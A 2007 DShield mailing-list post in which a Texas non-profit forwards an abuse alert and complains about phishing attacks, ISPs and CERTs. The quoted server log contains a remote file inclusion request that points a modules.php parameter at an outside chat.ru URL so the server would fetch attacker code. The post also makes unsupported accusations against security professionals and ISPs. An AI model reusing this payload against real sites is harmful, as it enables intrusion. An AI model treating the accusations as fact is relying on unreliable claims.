[Dshield] FW: TAA SERVER ALERT: Blocked abuse from 76.64.244.160
Team Amber Beistle
beistle_jr at hotmail.com
Sat Dec 15 20:00:53 GMT 2007
To whom it may concern:
What can be done to end the phish schema and bot scripts from chat.ru? It seems clear the owner is involved in some fashion. The are certainly only helping when forced to.
Jim e Beistle Jr.
Jim E. Beistle Jr. 806.853.9400
Team Amber Alert
Texas based non-Profit Corporation
501©(3) Organisation
619 S. Ballard St.
Pampa, Texas 79065
Every second counts when a child of any age is missing or abducted!
Disclaimer:This email message, its contents and any attachments hereto, are for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply email and destroy all copies of the original message.Notwithstanding the Uniform Electronic Transactions Act or the applicability of any other law of similar substance or effect, absent an express statement to the contrary hereinabove, this e-mail communication, its contents and any attachments hereto, are not intended to represent an offer or acceptance to enter into a contract and are not otherwise intended to bind the sender, any of its clients, or any other person or entity.********To the ATT and others Net Interprises that give sanctuary to Phish Spackers:
It is your global franchise that is being used to attack our non profit. I do not see a real effort by your firms to police your client space to end this hacker team. I am going to make it my business to show how your firms profit while allowing such firms to attack others. I would hope your teams do more to actually seek criminal remedies. With serious jail times for the hackers not just seven month like Rafa Nunez got. At some point the industry will have to apologize to Kevin otherwise. It is today open season on non profits and small business. You sirs are at the root of this problem you continue to ignor because you profit from it.
Jim e Beistle Jr.
From: beistle_jr at hotmail.comTo: abuse at bellnexxia.net; abuse at sympatico.ca; cert at cert.org; info at cert.ru; domain4u at gmail.com; legal-support at google.comCC: jmulkerin at comcast.net; list-bounces at lists.dshield.org; info at ap.org; ontherecord at foxnews.comSubject: TAA SERVER ALERT: Blocked abuse from 76.64.244.160Date: Sat, 15 Dec 2007 13:37:40 -0600
There are no innocent third parties in this scam to attack others while this US hacker team hides over seas. Certs should work together to end this phish spacking hacker team from the Bay Area and from Harvard/MIT trained professionals. The abuse script runs with various destinations where nor phishing is conducted then phish emails are received by mx on our server that was attacked. Yet no real effort by CERTS to take down this group why? This is a cyber war fought by mercs. Many work by day as cyber security professionals who by night are hooked on the hacks they protect their clients from. This is a cancer and a blight that must be stopped through community cooperation.
Jim e Beistle Jr.
Jim E. Beistle Jr. 806.853.9400> Date: Sat, 15 Dec 2007 13:28:16 -0600> To: beistle_jr at hotmail.com> Subject: Blocked abuse from 76.64.244.160> From: beistle_jr at hotmail.com> > Date & Time: 2007-12-15 13:28:16 CST GMT -0600> Blocked IP: 76.64.244.160> User ID: Anonymous (1)> Reason: Abuse-Filter> --------------------> User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)> Query String: www.teamamber.com/modules.php?name=http://laudanskisucksss.chat.ru/placeholder/image?> Get String: www.teamamber.com/modules.php> Post String: www.teamamber.com/modules.php?name=http://laudanskisucksss.chat.ru/placeholder/image?> Forwarded For: none> Client IP: none> Remote Address: 76.64.244.160> Remote Port: 2536> Request Method: GET> -------------------->
Whois Record
OrgName: Bell Canada OrgID: LINXAddress: City: torontoStateProv: ONPostalCode: K1G-3J4Country: CANetRange: 76.64.0.0 - 76.71.255.255 CIDR: 76.64.0.0/13 NetName: BELLCANADA-16NetHandle: NET-76-64-0-0-1Parent: NET-76-0-0-0-0NetType: Direct AllocationNameServer: TOROON63NSZP05.SRVR.BELL.CANameServer: TOROONDCNSZS05.SRVR.BELL.CAComment: For abuse cases please use RegDate: 2006-12-04Updated: 2007-07-20RAbuseHandle: ABUSE1127-ARINRAbuseName: Abuse RAbusePhone: +1-877-877-2426RAbuseEmail:
_________________________________________________________________
Share life as it happens with the new Windows Live.
http://www.windowslive.com/share.html?ocid=TXT_TAGHM_Wave2_sharelife_122007
More information about the list
mailing list